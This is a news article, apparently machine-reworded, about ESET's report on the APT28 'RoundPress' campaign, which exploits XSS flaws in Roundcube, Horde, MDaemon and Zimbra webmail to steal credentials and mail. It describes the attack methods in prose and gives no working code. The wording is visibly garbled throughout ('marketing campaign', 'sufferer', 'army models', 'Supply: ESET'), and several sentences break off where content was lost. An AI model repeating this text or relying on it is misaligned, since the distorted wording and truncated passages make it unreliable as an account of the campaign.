Hackers are operating a worldwide cyberespionage marketing campaign dubbed ‘RoundPress,’ leveraging zero-day and n-day flaws in webmail servers to steal e mail from high-value authorities organizations.
ESET researchers who uncovered the operation attribute it with medium confidence to the Russian state-sponsored hackers APT28 (aka “Fancy Bear” or “Sednit”).
The marketing campaign began in 2023 and continued with the adoption of latest exploits in 2024, focusing on Roundcube, Horde, MDaemon, and Zimbra.
Notable targets embrace governments in Greece, Ukraine, Serbia, and Cameroon, army models in Ukraine and Ecuador, protection firms in Ukraine, Bulgaria, and Romania, and demanding infrastructure in Ukraine and Bulgaria.
Supply: ESET
Open e mail, have information stolen
The assault begins with a spear-phishing e mail referencing present information or political occasions, typically together with excerpts from information articles so as to add legitimacy.
A malicious JavaScript payload embedded within the HTML physique of the e-mail triggers the exploitation of a cross-site scripting (XSS) vulnerability within the webmail browser web page utilized by the recipient.
All that’s wanted from the sufferer is to open the e-mail to view it, as no different interplay/clicks, redirections, or information enter is required for the malicious JavaScript script to execute.
Supply: ESET
The payload has no persistence mechanisms, so it solely executes when the malicious e mail is opened.
The script creates invisible enter fields to trick browsers or password managers into autofilling saved credentials for the sufferer’s e mail accounts.
Supply: ESET
Moreover, it reads the DOM or sends HTTP requests to gather e mail message content material, contacts, webmail settings, login historical past, two-factor authentication, and passwords.
The info is then exfiltrated to hardcoded command-and-control (C2) addresses utilizing HTTP POST requests.
Every script has a barely completely different set of capabilities, adjusted for the product it is focusing on.
Vulnerabilities focused
Operation RoundPress focused a number of XSS flaws in numerous webmail merchandise that necessary organizations generally use to inject their malicious JS scripts.
The exploitation ESET related to this marketing campaign entails the next flaws:
- Roundcube – CVE-2020-35730: A saved XSS flaw the hackers utilized in 2023, by embedding JavaScript straight into the physique of an e mail. When victims opened the e-mail in a browser-based webmail session, the script executed of their context, enabling credential and information theft.
- Roundcube – CVE-2023-43770: An XSS vulnerability in how Roundcube dealt with hyperlink textual content leveraged in early 2024. Improper sanitization allowed attackers to inject
- MDaemon – CVE-2024-11182: A zero-day XSS flaw within the MDaemon E-mail Server’s HTML parser, exploited by the hackers in late 2024. By crafting a malformed title attribute with a noembed tag, attackers might render a hidden
payload, executing JavaScript. This enabled credential theft, 2FA bypass, and chronic entry through App Passwords.
- Horde – Unknown XSS: APT28 tried to take advantage of an previous XSS vulnerability in Horde by inserting a script in an
handler. Nevertheless, the try failed, probably resulting from built-in filtering in fashionable Horde variations. The precise flaw is unconfirmed however seems to have been patched within the meantime.
- Zimbra – CVE-2024-27443: An XSS vulnerability in Zimbra’s calendar invite dealing with, which hasn’t been tagged as actively exploited earlier than. Unsanitized enter from the X-Zimbra-Calendar-Meant-For header allowed JavaScript injection into the calendar UI. APT28 embedded a hidden script that decoded and executed base64 JavaScript when the invite was seen.
Though ESET doesn’t report any RoundPress exercise for 2025, the hackers’ strategies could possibly be simply utilized to this 12 months too, as there is a fixed provide of latest XSS flaws in in style webmail merchandise.
Primarily based on an evaluation of 14M malicious actions, uncover the highest 10 MITRE ATT&CK strategies behind 93% of assaults and methods to defend in opposition to them.
